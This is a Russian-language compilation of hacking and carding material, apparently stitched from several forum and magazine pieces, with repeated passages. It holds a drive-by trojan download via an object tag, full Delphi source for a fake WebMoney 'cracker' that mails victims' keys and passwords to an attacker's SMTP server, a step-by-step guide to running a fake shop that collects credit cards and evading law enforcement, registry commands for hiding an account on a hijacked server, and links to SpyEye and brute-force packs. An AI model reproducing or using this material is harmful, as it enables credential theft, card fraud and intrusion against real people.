<object data="/object.html">Привет всем ;)</object>А в object.html положить скрипт, например на Visual Basic. В нем будет производиться выкачивание трояна по указанному адресу и его последующий запуск. При желании можно пофантазировать с записью бэкдора в реестр (если, конечно, в нем уже не реализована подобная функция), но это исключительно проблемы взломщика.
Для записи IP-адреса в лог-файл надо написать простенький perl-скрипт. Например, такой:
Perl-скрипт для записи адреса в лог
Code:
#!/usr/bin/perl
print "Content-type: text/html\n\n";
$ip=$ENV{REMOTE_ADDR};
open(LOG,">>ipz.log");
print LOG "$ip\n";
close(LOG);На этот сценарий делается редирект с главной страницы, либо вызывается SSI-вкладка, к примеру, следующая:
Code:
<!--#exec cgi="/path/to/iplog.cgi"-->.Следует помнить, что для выполнения SSI-вставок, файлу необходимо дать расширение shtml. Что касается файлов для записи (ipz.log), то они должны иметь атрибут 666.
Смысл этого метода заключается в засылке вредоносных программ на компьютер жертвы, используя бреши в операционной системе. Регулярно обновляемый список уязвимостей ты можешь найти на любом портале по безопасности.
А как же Linux?
Что касается Linux, то все методы этой, казалось бы, неприступной системы были изложены в статье этого номера "Найди и поимей!". В этой системе можно найти, пожалуй, только кредитные карты и файлы, хранящие в себе пароли, а также аккаунты на какие-либо ресурсы.
Эффективным способом хищения информации является снифинг данных. Снифер - программа, которая перехватывает весь трафик на определенных интерфейсах и отбирает из него инфу, которая указана в конфе снифака. Программ, которые перехватывают весь трафик и записывают его в логи (при этом фильтрация остается проблемой хакера), довольно мало. В основном, сниферы удобно настраиваются и незаметно запускаются на сервере.
Принцип всех сниферов основан, как я уже сказал, на перехвате данных определенного сетевого интерфейса. При этом устанавливается режим promisc, при котором все данные проходят через сетевую карту, несмотря на то, что предназначены они были для других машин. Ты, наверное, догадываешься, что успешно заюзать снифер можно лишь на компьютерах, которые выполняют функцию маршрутизаторов. Если это так, то хакер будет перехватывать весь трафик в локальной сети.
В последнее время сниферы пишут очень грамотные люди. Их не способны засечь никакие утилиты, типа ps, ifconfig, IDS и прочие.
Еще одним интересным способом взлома является брутфорсинг (перебор) паролей на определенный сервис. Я слышал о таких приватных проектах, как переборщик https-аккаунтов. Таким образом, взломать учетную запись бизнесмена на каком-либо секурном сервисе вполне реально.
Я уже не говорю о переборе паролей на небезопасных сервисах, которые поддаются снифингу. Таких брутфорсеров в интернете навалом, и большинство из них поддерживают многопоточный перебор. Конечно, прошли времена, когда в качестве аккаунтов применялись пары root/root или admin/admin, но словарные пароли встречаются очень часто. Так что подобрать пароль становится вполне реальным.
Таким образом, подвожу итог. Воровство аккаунтов - наболевшая тема. Воруют все кому не лень, и то, что плохо лежит. Поэтому, если ты преуспевающий сетевой бизнесмен, рекомендую защитить свою систему необходимыми патчами, а также грамотно настроенным фаерволом. Только тогда ты будешь в абсолютной безопасности.
Кодинг
Настало время представить проект, реализующий «крякер» кошельков WebMoney. На самом деле, эта фейк-программа просто отсылает все ключи и пароль на мыло злоумышленника.
Для реализации задуманного потребуются следующие компоненты:
5 Label (текст, вкладка Standard), 5 Edit (вводимый текст, вкладка Standard), 3 Button (кнопка, вкладка Standard), Memo (Текстовое поле, вкладка Standard) и ProgressBar (вкладка Win32), а также компоненты NMSMTP(вкладка FastNet) и OpenDialog(вкладка Dialogs).
Назначаем caption кнопкам и текстовым полям.
Code:
Label1.Caption := 'WM (Webmoney Identificator)';
Label2.Caption := 'Кошелек (Пример: Z143365768493)';
Label3.Caption := 'Пароль WM';
Label4.Caption := 'Путь к файлу ключей';
Label5.Caption := 'Сумма для перевода';затем кнопкам:
Code:
Button1.Caption := 'Обзор';
Button2.Caption := 'Генерировать';
Button3.Caption := 'Отмена';Полю Memo ставим текст, тоже через переменные:
Code:
memo1.text := 'Примечание:'+#13#10+'Размер файла ключей должен быть минимальным, т.к. программа изменяет его содержимое и закачивает на сервер.'+#13#10+
'Если размер будет более 1 мегабайта, то компания WebMoney заметит среди своих'+#13#10+
'ключей - твой, который имеет большой размер.';
События для нажатых кнопок:
// Обзор
Code:
procedure TForm1.Button1Click(Sender: TObject);
begin// если диалог удачно запущен то
Code:
if opendialog1.Execute then// записываем имя файла
Code:
Edit4.Text := opendialog1.FileName;
end;// Генерировать
Code:
procedure TForm1.Button2Click(Sender: TObject);
begin// ProgressBar1 - изменение положения ползунка прогресс-бара
Code:
ProgressBar1.Position:=0;// Вложенные файлы
Code:
NMSMTP1.PostMessage.Attachments.Text := Edit4.text;
ProgressBar1.Position :=ProgressBar1.Position+10;// Body отправляемого письма
Code:
NMSMTP1.PostMessage.Body.Text := 'WmCrack 9.1.2 PRO Message'+#13#10+
'Some lame use you programm...:)'+#13#10+
'WM ID: '+Edit1.text+#13#10+
'Z or E or R: '+Edit2.text+#13#10+
'Pass:): '+edit3.text+#13#10+
'File.kwm: '+Edit4.text+#13#10+
'Money: '+Edit5.text;
ProgressBar1.Position:=ProgressBar1.Position+10;// Тема письма
Code:
NMSMTP1.PostMessage.Subject :='>>>WMCRACK*************';
ProgressBar1.Position:=ProgressBar1.Position+10;// Имя программы, которая отправляла письмо
Code:
NMSMTP1.PostMessage.LocalProgram :='SomeShit';
ProgressBar1.Position:=ProgressBar1.Position+10;// Reply-To адрес
Code:
NMSMTP1.PostMessage.ReplyTo :='[email protected]';
ProgressBar1.Position:=ProgressBar1.Position+10;// Почта отправителя
Code:
NMSMTP1.PostMessage.FromAddress :='[email protected]';
ProgressBar1.Position:=ProgressBar1.Position+10;// Имя отправителя
Code:
NMSMTP1.PostMessage.FromName :=':WMCrack:';
ProgressBar1.Position:=ProgressBar1.Position+10;// E-mail кардера
Code:
NMSMTP1.PostMessage.ToAddress.text :='[email protected]';
ProgressBar1.Position:=ProgressBar1.Position+10;// SMTP сервер хакера
Code:
NMSMTP1.Host := 'i-have.cc';
ProgressBar1.Position:=ProgressBar1.Position+10;// Отсылка письма
Code:
NMSMTP1.SendMail;
ProgressBar1.Position:=100;// Сообщение об удачной отправке денег жертве
Code:
Showmessage('Обновите свой WM Keeper, сумма должна придти в течение 1-2 минут.');
end;// Отмена
Code:
procedure TForm1.Button3Click(Sender: TObject);
begin
NMSMTP1.Abort;// Прогресс-бар ставим на 0
Code:
ProgressBar1.Position :=0;
end;Обзор сниферов
Как я уже говорил, в инете полно сниферов. На первый взгляд разобраться в них не так-то просто, поэтому публикую небольшой обзор программ-нюхачей.
Sniffit. Один из первых сниферов, который по-прежнему является очень популярным. Он сохраняет первые 400 байтов пакета по умолчанию, но хакер может настроить его так, чтобы он перехватывал пароль жертвы.
TCPdump. Знаменитый снифер. Считается профессиональным административным средством.
ADMsniff. Известная, очень квалифицированная группа хакеров ADM написала отличный снифер. Определенно советую посмотреть, т.к. все, что они делают, стоит внимания.
Linsniffer. Популярный снифер, разработанный для платформ Linux.
Sunsniff. Этот снифер выполнен под платформу SunOS. Возможно, один из самых известных сниферов, сделанный почти десять лет назад.
Поломали?
Если ты оказался в лапах хакера, то, возможно, у тебя бреши в операционке. Обязательно читай bugtraq и вовремя накладывай патчи на свою систему. Взять их можно на www.microsoft.com.
Способов украсть ценную информацию и сбережения кардера очень много.
Я не буду тебя учить эксплуатировать уязвимость. Об этом писали различные хакерские порталы, а также Хакер #9. Я лишь заострю твое внимание на командах, которые могут пригодиться взломщику, захватившему права на системе жертвы.
В поиске информации нет ничего хитрого. Если хакер нетерпелив (а таких мало), он просто шарит по папкам и выкачивает файлы с подозрительными именами (типа 1111.doc или paroli.doc). Текстовики можно прочитать на месте командой "type file".
Если хакер взламывает подобный ресурс, он просто заменяет в исходном коде скрипта ссылку и параметры на свой кошелек WebMoney.
Следует помнить, что для выполнения SSI-вставок, файлу необходимо дать расширение shtml.
Эффективным способом хищения информации является снифинг данных. Снифер - программа, которая перехватывает весь трафик на определенных интерфейсах и отбирает из него инфу, которая указана в конфе снифака.
Еще одним интересным способом взлома является брутфорсинг (перебор) паролей на определенный сервис. Я слышал о таких приватных проектах, как переборщик https-аккаунтов.
Личный псевдосайт кардера
Некоторые личности ничего не делают и... получают реальные доходы. Без начального капитала, с абсолютного нуля. И повторить их опыт может каждый, даже ты. Для этого нужно желание, удача и чуть-чуть терпения. Я расскажу тебе о прибыльном бизнесе, построенном на псевдосайтах.
Что такое псевдосайты
Псевдосайт - это не что иное, как умело сделанный ресурс, который имеет автоматизированную систему оплаты по кредитным картам. Но в отличие от проектов, которые исправно высылают товар после оплаты, псевдоресурс совершенно негуманно динамит покупателя, помещая данные о кредитке в отдельную базу. При серьезном подходе к делу, псевдосайт может приносить кардеру умопомрачительные доходы. Все потому, что интернет-магазины (либо порногалереи) пользуются большой популярностью среди тупых, но богатых буржуев, для которых онлайновые покупки - норма жизни.
Что нам стоит сайт построить
Чтобы построить псевдосайт, необходимо найти для него программное обеспечение - движок. Он состоит из отдельных html-страниц (формы для оплаты) и скриптов, которые обрабатывают вводимую информацию. Авторы движков используют два способа для хранения полученных данных:
Через базу данных (БД). Этот способ избавляет от многих проблем, с которыми может столкнуться пользователь движка, для успешной работы достаточно создать базу и пару таблиц. Затем скрипты сами будут обращаться к БД и запрашивать/сохранять данные.
Посредством файлов. Все бесплатные движки распространяются именно с таким алгоритмом. Здесь тебе придется попотеть, изменяя дефолтовые значения путей в конфигах сценариев. Нельзя забывать и о правах доступа к файлам, в которые будет записываться информация (проставляются вручную).
На фриварных источниках валяется неплохой движок dcshop (http://kamensk.net.ru/forb/1/x/id1608.zip). Он организует универсальный интернет-магазин по продаже всякого хлама. Умеет авторизовывать после оплаты по кредитке и комплектуется скриптом для администрирования товаров.
Удобно, что dcshop работает как под UNIX, так и под NT платформы. В довесок к этому он снабжается подробным мануалом и кучей дефолтовых конфигов.
Для того чтобы магазин функционировал, от хостинга требуется:
- доступ к FTP-серверу;
- WWW-сервер с поддержкой cgi-сценариев;
- желательна поддержка собственных .htaccess-файлов;
- желателен доступ по SSH, что позволит без особых проблем установить и изменить настройки dcshop прямо с шелла.
Первые два пункта, которые необходимы, удовлетворяют практически все бесплатные хостинги, поэтому регистрируйся на буржуйском ресурсе (проще отмазаться потом) и приступай к установке онлайн-магазина. При желании смотри работу проекта в онлайне по адресу http://kamensk.net.ru/forb/cgi-bin/shop/dcshop.cgi.
Хотя dcshop для хранения не использует БД (пишет в отдельные файлы), он как раз подойдет, так как не каждый халявный хостинг предоставляет доступ к БД (но бывают приятные исключения, например, www.spaceports.com).
Доставка и установка
Движок состоит из трех скриптов: магазин с поддержкой корзины, админ-зона и сценарий для запроса инфы о кредитной карте. К каждому скрипту есть свой конфигурационный файл.
Сперва настрой конфиг .setup, в нем необходимо изменить несколько значений переменных и пути к директориям. Главной переменной в конфиге является $cgidir, она указывает на директорию cgi-bin, в которой будет располагаться большинство скриптов движка. Лучше всего создать подпапку в каталоге со скриптами и определить в ней сценарии магазина. К примеру, значение $cgidir может быть "/home/carder/web/cgi-bin/eshop".
Далее идут пути, которые зависят от $cgidir. Лучше их не менять, чтобы не было путаницы при закачивании файлов на сервер. Следующая за ними переменная $order_database ведет к самому интересному файлу, ради которого мы и устанавливаем проект dcshop. Это база кредитных карт, точнее, в этот документ будет сваливаться вся информация о буржуйских кредах. Дефолтовое значение переменной - "orders.txt", и находится этот файл по пути, прописанному в переменной $order_dir. Рекомендую менять пути на более сложные, иначе база будет доступна через веб.
Переменная $templatefile отвечает за главный html-файл, который будет подгружаться после исполнения скрипта dcshop.cgi. В этот файл ты можешь поставить свой копирайт, либо убедить буржуя в законности твоей коммерческой деятельности
.Затем укажи путь к бинарнику sendmail. Обычно он располагается в директории /usr/sbin, в противном случае местоположение будет оговорено администрацией хостинга. Переменная задается для того, чтобы после успешного заказа клиент получил письмо о принятии платежа. Заодно поменяй адрес smtp-сервера, мыло, с которого будет отправлено письмо, а также его тему (например, smtp.spaceports.com).
В следующей секции конфига задаются абсолютные пути к сайту. Допустим, тебе дали домен shop.hosting.net. Исходя из этого, поменяй переменные $cgiurl и $mainurl на значения к директориям с html и cgi-bin соответственно, к примеру, http://shop.hosting.net/cgi-bin/eshop. Там же укажи путь к картинкам (они будут располагаться в директории для html-файлов).
Проект подразумевает наличие https-сервера, но я сильно сомневаюсь, что фриварный хостинг предлагает https. Если твой - не исключение из правил, то значения $secureurl и $secureimgurl делай равными $cgiurl и $mainurl. В конце секции укажи e-mail администратора проекта.
На этом, собственно, дефолтовая настройка заканчивается. Дополнительно можно (настоятельно советую) переопределить пути к дефолтовым скриптам. Тогда в случае обнаружения баги в проекте dcshop, твой ресурс не взломают (не зная новые пути). Итак, меняй значения $dcscript, $checkout_script и $adminscript. Открой скрипт dcshop.cgi и измени путь к конфигу в строке require. И переименуй конфиг. Если возникнут проблемы, про это есть и в FAQ’е проекта, и в файле readme.
Оттачиваем остальные скрипты
Помимо главного конфига, есть setup-файлы для скриптов checkout и admin. В конфиге для checkout измени дефолтовые темплейты html на что-нибудь более красивое (лично мне не понравилось слово "demo" в тексте). А в dcshop_admin.setup тебе придется поменять путь к директории, в которой хранится пароль администратора. Рекомендую закрыть доступ к директории с указанным файлом (для чего и нужна поддержка собственных .htaccess-файлов), потому что знающий чел сможет увидеть содержимое каталога, а следовательно, и файла с паролем.
Правильная транспортировка
Настало время для переноса файлов на FTP-сервер. Сперва создай директорию для html-файлов, а также вложенный каталог Images (обрати внимание на регистр). Затем перелей все дефолтовые изображения в эту папку. Зайди в cgi-bin/eshop, в эту директорию залей все конфиги и скрипты. Нюанс - заливать надо в ASCII-режиме, иначе скрипты не будут работать. Осталась самая малость - поставь на все каталоги права 777, а на файлы .pl и .cgi - 755.
Самое время затестить результат. Обратись к главному скрипту магазина dcshop.cgi. Если все верно, то магазин будет функционировать без всяких побочных выкидонов. Если выдаст ошибку 500, узнай причину, по которой сценарий не работает. Для этого создай файл .htaccess в корне WWW со следующим содержанием:
Code:
<Directory "/path/to/www">
ErrorLog "/path/to/www/error.log"
</Directory>После этого еще раз обратись к скрипту и читай содержимое лога в html-директории. Возможно, ты просто забыл залить какой-нибудь файл либо изменить дефолтовый путь.
Теперь займись админским скриптом. Чтобы никто тебя не поимел либо не спер большую базу новых кредиток, зайди в админ-зону и зарегистрируйся под новым юзером с правами администратора. После этого топай по линку "Change Configuration Setting" и запрети регистрацию новых юзеров. Рули на здоровье своим онлайн-магазином.
Имеет смысл создать отдельную директорию для админ-зоны и закрыть ее дополнительной авторизацией (от греха подальше). Это легко делается с помощью стандартных средств Apache. Вначале необходимо создать .htaccess файл в каталоге с админ-скриптом. В нем пиши следующее:
Code:
AuthType Basic
AuthName "Admin zone"
AuthUserFile "/path/to/.htpasswd"
Require valid-userЗатем создай .htpasswd, в котором записывается аккаунт в виде пары login
assword. Допустимые алгоритмы шифрования пароля: DES, MD5, SHA, а также Plain text. Кодировать пароли умеет утилита htpasswd, входящая в поставку Apache. Алгоритм MD5 поддерживается всеми версиями web-сервера и наиболее надежный. Ставится пароль командой htpasswd -bcm .htpasswd admin myp4ssw0rd, опция -bcm означает запись MD5-пароля в новый .htpasswd.Права на .htaccess и .htpasswd установи равными 600. Это позволит только тебе изменять их, у других бродяг не будет доступа к этим важным файлам.
Строим бизнес
Теперь необходимо изменить дефолтовые товары. Если с фантазией у тебя все в порядке, ты запросто придумаешь товары, которые захотят купить богатые и тупые иностранцы. Но прежде необходимо разобраться со структурой базы товаров.
В файле с товаром (неважно каким) можно задать несколько параметров. Это идентификатор (ID), категория (Category), название продукта (Name), изображение (Image), описание(Description), цена (Price) и налог с продаж (Taxable). Дополнительно есть свои опциональные параметры, например, цвет и стиль. О них читай в файле readme.txt. Забиваешь данные, а они автоматом помещаются в папку Data относительно каталога cgi-bin/.
В этом же каталоге хранится установочный скрипт с краткой информацией о данной категории товаров. Удобно, что движок включает четыре готовых образца. Таким образом, просто сделай аналогичный темплейт для категории товара и вперед.
База все-таки лучше
Написать свой движок с поддержкой БД не так уж и сложно. Необходимо знать принципы обмена между клиентом (скриптом проекта) и сервером (БД mySQL), к которому у тебя будет доступ. При этом не обязательно писать отдельный движок, достаточно внести некоторые изменения в код dcshop и научить его обращаться с БД.
С помощью специального модуля DBI.pm можно работать с mySQL (именно такая БД рулит на большинстве хостингов). Тебе потребуются три вещи: умение коннектиться к базе, вставлять и изменять в ней данные, а также считывать инфу из нужных таблиц в БД. Чтобы переделать файловый движок, необходимо всего лишь заменить обращение к файлу запросом к базе. Фрагменты кода, реализующие грамотную работу с mySQL (код снабжен подробными комментариями), скачивай по адресу http://kamensk.net.ru/forb/1/x/mysql-code.
Закон есть закон
Когда-нибудь твой ресурс будет закрыт. Это произойдет, скорее всего, после того, как в службу поддержки хостинга поступит жалоба от очередного надутого клиента. Поэтому тебе не помешают несколько полезных советов, чтобы последствия закрытия проекта не отразились на твоем здоровье:
1. При организации мини-порногалереи никто не будет требовать с тебя какой-либо ответственности, если ты сделаешь стартовую страницу с предупреждением о совершеннолетии клиента.
2. Если дела пошли в гору, зарегистрируй себе домен второго уровня и заведи нормального хостера. Когда твой ресурс удалят, ты можешь легко изменить dns-зоны своего домена при переезде на другой хостинг.
3. Постарайся оставлять как можно меньше данных о себе на страницах ресурса. Лучше скажи, что ты какой-нибудь богатый китаец, продающий ручки Паркер, чем бедный русский студент
.4. При переезде тебе придется столкнуться с такой проблемой, как бэкап всех данных. Это необходимо сделать вовремя, когда почувствуешь, что дело пахнет керосином. Если с файлами проблем не возникает, умело забэкапить базу - дело тонкое (хотя и несложное). Для этого потребуется помощь небольшой утилиты mysqldump, которая входит в поставку mysqlclient. Заходишь на шелл своего хостинга и набираешь команду:
Code:
$ mysqldump -u client -pclientpassword eshop > eshop.sqlСоответственно, аккаунт к базе должен иметь вид client:clientpassword, а база называться eshop. Бинарник сформирует структуру таблицы, которая должна быть заархивирована и транспортирована на другой хостинг. Сжимать лучше архиватором bzip:
Code:
$ tar jcf eshop.tar.bz2 eshop.sqlНа новом хостинге необходимо его распаковать и создать копию структуры базы (по файлу eshop.sql). При этом не нужно заботиться о создании таблиц и БД, все сделает mysqldump:
Code:
$ tar jxf eshop.tar.bz2
$ mysql -u client -pclientpassword < eshop.sqlС помощью переопределения ввода ты позволяешь бинарнику mysql получить команды прямо из файла. В нашем случае из бэкапа eshop.sql.
5. Чтобы выйти сухим из воды, удали все файлы со старого хостинга (разумеется, после бэкапа) и дропни базу данных. Это можно сделать командой "drop database eshop;" в клиенте mysql.
Теперь ты кардер
Вот и все. Псевдобизнес - очень прибыльное дело, потому что все заработанные кредитки уходят только тебе. В день такой ресурс могут посетить десятки, а то и сотни богатых буржуев (зависит от раскрутки). Но в организации подобных проектов существует определенная доля риска, иначе все понаделали бы онлайн-магазинов и жили за счет буржуев. Поэтому, если ты прилично зарабатываешь, и решил создать псевдосайт только из любопытства, поразмысли на досуге, стоит ли тебе тратить свои нервы и деньги на противозаконную деятельность...
Раскрутка ресурса
Сделать псевдосайт - полдела, необходимо его еще и раскрутить. В противном случае твой ресурс запылится и не принесет никакой пользы. Для привлечения посетителей, конечно, все средства хороши, но не все эффективны. По-хорошему, если ты планируешь заколачивать на ресурсе приличные бабки, придется сначала потратиться на раскрутку.
Прежде всего, учитывай, что твоя основная аудитория - иностранцы. Следовательно, реклама рассчитана на них. Скорее всего, сам ресурс придется сделать на английском языке, либо на русском и английском одновременно. Далее регистрируешь ресурс на поисковых серверах, при этом тебя интересуют как наши поисковики, так и забугорные. Никогда не заморачивайся с поиском полного списка поисковых серверов, достаточно знать один крупный (к примеру, www.yandex.ru или www.rambler.ru), а остальные находишь непосредственно через него.
Часто эффективно проходит фокус с перенаправлением трафика с других порноресурсов. То есть создается порносервер, раскручивается в одиночку, а потом при помощи этого сервера раскручивают любые другие. Как именно это сделать - дело техники: перенаправлять часть заходов, подгружать параллельно или использовать ссылки-ловушки. При этом на раскручиваемом ресурсе ставятся счетчики рейтинговых систем, и он взлетает до небес. А там уже как лавина. Далее раскрученный ресурс, в свою очередь, можно использовать для раскрутки последующего.
Некоторые умельцы специально заводят ресурсы, чтобы предлагать другим раскрутку за деньги. Ты же можешь найти подобные ресурсы на условиях взаимораскрутки. То есть на первых порах они раскручивают тебя, а в будущем вы будете обмениваться трафиком, взаимно увеличивая количество реальных посещений на своих сайтах.
Другой эффективный способ привлечения потенциальных покупателей на свой псевдоресурс - баннерная реклама. При этом не обязательно выставлять код баннерной системы, можно выкупить показы на вторичном рынке, что порой очень выгодно. Вторичный рынок баннерных показов - по сути трафикогенерящие ресурсы, зарегистрированные в баннерных сетях. Часть показов они тратят на собственную раскрутку, а часть продают на так называемом вторичном рынке баннерных показов. Есть еще вариант продавать показы непосредственно баннерной сети, но цены будут ниже, плюс не все баннерные сети выкупают свои показы, либо выкупают только на определенных (чаще всего невыгодных) условиях.
Для покупки баннерных показов на вторичном рынке тебе понадобится баннерная биржа, на которой ты сможешь определиться с ценами (средние по бирже) на те или иные баннерные сети и форматы баннеров, плюс выкупить необходимые показы, если они есть в наличии. Одна из популярных баннерных бирж - www.banstock.com. Там тебе и FAQ, и статистика по наиболее популярным (читай - пользующимся спросом) баннерным сетям и форматам, а когда-нибудь ты сможешь и сам продавать через нее баннерные показы другим начинающим ресурсам
.Хороший хостинг
www.h1.ru - российский бесплатный хостинг, баннер хостера обязателен, PHP/CGI/mySQL/SSH, могут отключить за нарушение регламента
www.rcdom.ru - PHP/CGI/mySQL
www.webservis.ru - PHP/CGI, баннер хостера обязателен
www.fatal.ru - PHP/CGI
www.spaceports.com - PHP/CGI/mySQL, баннер на сайте необязателен
www.webhosting.bootbox.net - PHP/CGI, без рекламы
www.come.to - PHP/CGI, баннер хостера обязателен
www.dot.tk - PHP/CGI, бесплатный домен второго уровня в зоне .tk
www.cgi.ru - обширный каталог PHP/CGI-скриптов (как бесплатных, так и коммерческих), именно оттуда был скачан описываемый проект dcshop
4wm.virtualave.net - большая коллекция CGI/C/C++ скриптов, все проекты в основном бесплатные
getscripts.vov.ru - ресурс, посвященный CGI-скриптам
www.cgi.agava.ru - русские CGI/PHP-скрипты в ассортименте
Бесплатный движок
При серьезном подходе к делу, псевдосайт может приносить кардеру умопомрачительные доходы.
Чтобы построить псевдосайт, необходимо найти для него программное обеспечение - движок. Он состоит из отдельных html-страниц (формы для оплаты) и скриптов, которые обрабатывают вводимую информацию.
На фриварных источниках валяется неплохой движок dcshop (http://kamensk.net.ru/forb/1/x/id1608.zip). Он организовывает универсальный интернет-магазин по продаже всякого хлама.
Рекомендую закрыть доступ к директории с указанным файлом (для чего и нужна поддержка собственных .htaccess-файлов), потому что знающий чел сможет увидеть содержимое каталога, а следовательно, и файла с паролем.
Нюанс - заливать надо в ASCII-режиме, иначе скрипты не будут работать. Осталась самая малость - поставь на все каталоги права 777, а на файлы .pl и .cgi - 755.
Затем создай .htpasswd, в котором записывается аккаунт в виде пары login
assword. Допустимые алгоритмы шифрования пароля: DES, MD5, SHA, а также Plain text. Кодировать пароли умеет утилита htpasswd, входящая в поставку Apache.При переезде тебе придется столкнуться с такой проблемой, как бэкап всех данных. Это необходимо сделать вовремя, когда почувствуешь, что дело пахнет керосином.
Если ты прилично зарабатываешь, и решил создать псевдосайт только из любопытства, поразмысли на досуге, стоит ли тебе тратить свои нервы и деньги на противозаконную деятельность.
1. Автоматически находить множество прокси
(для этого есть такая прога называется Proxy Switcher! Скачать ее можно тут
Proxy Switcher 5.17 [2016, ENG] :: RuTracker.org
rutracker.org
выполняет полностью все функции заялвенные космосом)
2. Сканировать интернет на наличие скрытых прокси
эту же функцию выполняет эта же прога Proxy Switcher!
3. Находить на дедиках ценные материалы, и суметь защищать свои
для этого есть програмка которая находит слова в тексте ! (например ищите СС? Вводите на дедике слово свзяаное с СС например CVV и если на дедике есть прога найдет!) скачать можно тут http://i-vd.org.ru/soft/find-txt.shtml Описание программы Folder Find Text и ещё один софт называется Everything - Программа для поиска файлов тут видео http://www.youtube.com/watch?v=wbZ2RV4Jp8U
4. Уметь быть скрытным на дедике от администратора
во первых надо чистить дедик посел каждого входа и выхода... во вторых надо иметь Админку на дедике... дабы тебя от туда не выкинули)) в третьих надо спрятать свой профиль на дедике) как это сделать?
Для WIN дедика заходишь в командную строку (cmd.exe) и пишешь:
Убрать учетку из меню выбора пользователей:
PHP код:
Code:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v пользователь /t REG_DWORD /d "00000000" /fЕще разумно скрыть папку с файлами на учетке:
Code:
attrib +h +s "C:\Documents and Settings\пользователь"где "пользователь" - имя твоей учетки (например, user).
А также подробная инфа может быть описанна тут http://forum.hackersoft.ru/showthread.php?p=94873#post94873
5. Нескольким видам получения дедиков
Приватный словарь, который собран из 30 млн SQL записей
Технология получения доступа с использованием минимума ресурсов компьютера
ответ на все эти вопросы вы найдете тут ) http://rghost.ru/47626356 пароль на скачивание 648968874 в паке находятся разные брутфорсы статьи и многое другое вообщем ВСЕ что нужно для обогощения дедиками))
6.Получать роутеры с минимальными потерями траффика
тут я бессилен т. к. я кардер и с трафиком такого рода дел не имел... да и мне не нужно... но все таки почитайте эту статью http://rutracker.org/forum/viewtopic.php?t=2953621
7. Получать уязвимые сайты и превращать их в прокси с шифрованием
на этот вопрос отвечает все таже прога proxy switcher http://rutracker.org/forum/viewtopic.php?t=3516193 вставляешь ссылку она сканит прокси и скосы... а вообще ребят на заметку прокси далеко уже не в теме и стоят они всего 1$ максимальная цена за хороший прокси... имхо ДОХНУТ они быстро!
8. Быстро создавать ботнет
создать быстро ботнет это легко... т. к. версий в паблике просто полно разных ддосеров а также вирей я бы посоветовал бы spyeye скачать его можно тут ЗАЛИВАЛ САМ!! http://my-files.ru/h4g0.Глазок.rar СРАЗУ СКАЖУ ЧТО АНТИВИРЬ БУДЕТ РУГАТСЯ ))! но самое главное что для ботнета нужен Трафик сплойты либо инжекции которые стоят как минимум от 500$ и выше... а также загрузки которые стоят примерно также )) но опять же ботнет можно иметь для разных целей )
9.Защищать свой дедик и компьютер от взлома
о дедиках мы уже говорили )) а теперь о компьютере ) есть такая веселая программка
http://tech.pp.ru/trans/truecryptrus/ TureCrypt) также в мануале о шифровании есть статьи про эту прогу !
10.Создать свой прокси сервис, или выгодно продать свою базу селлерам прокси и дедиков
как я уже и говорил прокси быстро дохнут и жить им от 20 минут до 12 часов) а дедике это определенная тема... как я уже писал выше ) http://rghost.ru/47626356пароль 648968874 тут есть не только софт как достать дедики но и свой собственный онлайн шоп по дедикам! Таким образам вы можите добывать дедике раскрутить свой шоп и продавтаь дедики ОНЛАЙН!
Механизм работы платежных систем
Кредитная карта, в первую очередь, является внешней частью твоего банковского счета. Работу кредитной системы обеспечивают: платежная система, банки, производители; простая покупка по кредитке представляет собой довольно сложный механизм. Об этом и многом другом я сегодня расскажу.
Механизм оплаты
Почти любая финансовая операции при использовании кредитки начинается с авторизации. Во время этого этапа необходимо определить, есть ли у тебя на счете необходимые средства и можешь ли ты ими воспользоваться. Авторизация может проводиться любым доступным способом. Решение об авторизации может принять сама карта (в случае карты с микросхемой) – это метод называется off-line, т.е. связываться ни с кем не надо. В противном случае необходимо запросить подтверждение у банка: запрос отправляется в первую очередь эквайреру (в процессинговый центр), затем пересылается эмитенту, который принимает решение, ответ перенаправляется снова эквайреру и только потом возвращается на место запроса (такой метод называется on-line). Это процесс может проходить через сеть, или продавец может просто спросить – голосом или по факсу.
Если авторизация подтверждена, то дальше ты можешь в полной мере распоряжаться зарезервированной суммой. Если ответ на запрос не пришел, то – извини. И это еще не худший вариант - в ответ может прийти приказ продавцу изъять у тебя карту (например, если они числится потерянной или украденной). Поэтому авторизация является ключевым этапом сделки. В редких случаях авторизации может и не быть, подробнее об этом ниже.
Сумма, на которую запрашивалась авторизация, на твоем счету замораживается, даже если ты вдруг передумаешь делать покупку. По завершении авторизации и через небольшой промежуток времени банк приступает к переводу средств на счет продавца. То есть - ты уже ушел из магазина, забрав покупки, а продавец все еще ждет свои деньги. Для начала эмитент отправляет запрос на перевод зарезервированных средств расчетному банку, который доставит их счет эквайрера, который уже, в свою очередь, перенаправит их туда, где ты совершил покупку. За перевод средств эквайрер оставит себе небольшой процент от суммы, за срочность процент будет больше. В общей сложности продавцу придется ждать денег от нескольких часов до нескольких дней. За это многие магазины не любят обслуживать креды.
Вся совокупность финансовых операций по кредам от начала до конца называется взаимообменом (или interchange).
Что нам может дать банк
С банковской точки зрения креды можно разделить на три основных класса. Это важно, так как этим определяется, каким образом ты сможешь распоряжаться своими деньгами или брать в кредит.
1. Дебетовые (расчетные) карты – ты можешь использовать только те средства, которые досрочно положил на свой счет. Такую креду получить проще всего, и стоит она дешевле остальных (иногда их даже выдают бесплатно). Никакой кредит или перерасход средств по расчетной карте не предусмотрен. Кстати, дебетовые карты являются самыми распространенными.
2. Кредитные карты – служат для получения определенного (заранее оговоренного) кредита под определенный процент на определенный срок. К сожалению, процент довольно велик – от 10 до 40% годовых для России. На счет карты деньги вносить не нужно. Соответственно, чем больший кредит дается по карте, тем ее сложнее получить и тем она элитнее (сумма кредита может доходить до нескольких десятков тысяч баксов). Для заключения контракта необходимо, помимо основных документов, представить справку о твоих ежемесячных доходах.
3. Овердрафтные карты (почти то же самое, что кредитно-дебетовая карта) – расчетные карты с кредитным лимитом. Можно класть деньги на счет и выполнять определенный перерасход. Кредит дается обычно на срок от одного до трех месяцев, но чем дольше у тебя остается долг, тем больший ты должен будешь выплатить процент. ИМХО, такие карты самые удобные.
По привычке и дебетовые, и овердрафтные, и кредитные карты называют просто кредитными (кредитками/кредами), что, как видишь, не совсем верно.
Кстати, самую первую свою кредитку можно приобрести уже с 14 лет.
В принципе, продавцу/банкомату абсолютно неважно, по какой карте ты расплачиваешься (твои это средства или кредит), они даже не знают, сколько денег у тебя на счету. Но в некоторых местах дебетовые креды не принимают, в отличие от кредитных или кредитно-дебетовых (в чем одно из их преимуществ).
